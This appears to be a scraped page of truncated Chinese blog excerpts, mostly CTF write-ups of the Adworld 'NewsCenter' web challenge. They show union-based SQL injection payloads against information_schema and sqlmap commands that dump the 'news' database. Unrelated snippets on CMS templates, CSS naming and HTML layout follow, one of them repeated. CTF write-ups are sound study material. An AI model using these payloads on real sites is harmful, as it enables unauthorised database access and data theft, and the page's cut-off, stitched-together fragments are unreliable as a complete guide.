攻防世界 web进阶练习 NewsCenter   题目是NewsCenter,没有提示信息.打开题目,有一处搜索框,搜索新闻.考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入.随便输入234234234,用burp抓包,发现是post方式,直接用sqlmap爆破.将http头保存为1.txt,试试用sqlmap爆数据库查看news数据库内容sqlmap -r 1.txt -D news --dump得到flag!…

攻防世界系列 :NewsCenter 方法一 1.打开题,看到搜索框首先想到的是sql注入 2.检查注入点 -1' union select 1,2,3# 存在注入漏洞 3.查库 附:Sql注入常见语句 -1' union select 1,2, group_concat(schema_name) from information_schema.schemata;# 可知服务器存在两个数据库information_schema和news. 4.查表 -1' union select 1,2, g…

NewsCenter 打开题目是一个搜索框我们首先尝试一下sql注入 判断了一下是使用''进行包裹的字符型sql注入 然后我们需要判断数据库列数 1' order by 3# 回显正常但by4的时候回显就不正常了 所以判断数据库有三列 下面就是一些常规操作了,首先看看回显位 -1' union select 1,2,3# 写-1的原因是不要让正常数据影响到我们注入测出的结果 测试数据库 -1' union select 1,2,group_concat(schema_name) from inf…

手工注入 查询所有数据库名称和表名 ' union select 1,table_schema,table_name from information_schema.tables# 发现就两个数据库information_schema与news 查询news数据库中的表的名称 ' union select 1,table_schema,table_name from information_schema.tables where table_schema='news' # 查询secret_ta…

打开文件发现有个搜索框,考虑是XSS或SQL注入,输入弹框语句不显示考虑到SQL注入,抓包将抓包信息保存为txt,用sqlmap爆破. 输入:sqlmap -r “sql.txt”,输出如下数据库版本信息为MYSQL 接着输入:sqlmap -r “sql.txt” --current-db 输出当前使用的数据库名为news 接着输入:sqlmap -r “sql.txt” -D news --tables输出当前的表名,猜测flag应该在secret_table中 输入:sqlmap -r “…

题目有一个搜索框,下面是搜索结果,最先考虑是sql注入 遇到sql注入,一般先用单引号,1,2尝试.先尝试构造输入为:sd' union select 1,2 #和sd' union select 1,2 ,3# (第一个  '  闭合后台命令的第一个  '    ,#注释掉后台的第二个  '    )只有1,2,3时才正确返回,说明数据格式为3列. 然后构造sd' union select 1,2,table_name from information_schema.tables#发现一个se…

一.   创建模板 demo 1 Tpl下创建demo文件-----后台启用新的模板 (网站信息--模板方案) 2 在模板在tpl/demo目录下创建Portal目录,然后在Portal目录下创建index.html 首页基本分为以下部分head,header,content,footer,scripts这五大部分 <<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type"…

CSS命名规则 头:header 内容:content/containe 尾:footer 导航:nav 侧栏:sidebar 栏目:column 页面外围控制整体布局宽度:wrapper 左右中:left right center 登录条:loginbar 标志:logo 广告:banner 页面主体:main 热点:hot 新闻:news 下载:download 子导航:subnav 菜单:menu 子菜单:submenu 搜索:search 友情链接:friendlink 页脚:foote…

CSS命名规则 头:header 内容:content/containe 尾:footer 导航:nav 侧栏:sidebar 栏目:column 页面外围控制整体布局宽度:wrapper 左右中:left right center 登录条:loginbar 标志:logo 广告:banner 页面主体:main 热点:hot 新闻:news 下载:download 子导航:subnav 菜单:menu 子菜单:submenu 搜索:search 友情链接:friendlink 页脚:foote…

瀑布流布局 HTML <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>瀑布流布局</title> <link rel="stylesheet" href="css/style.css"> <script src="js/script.js"></scrip…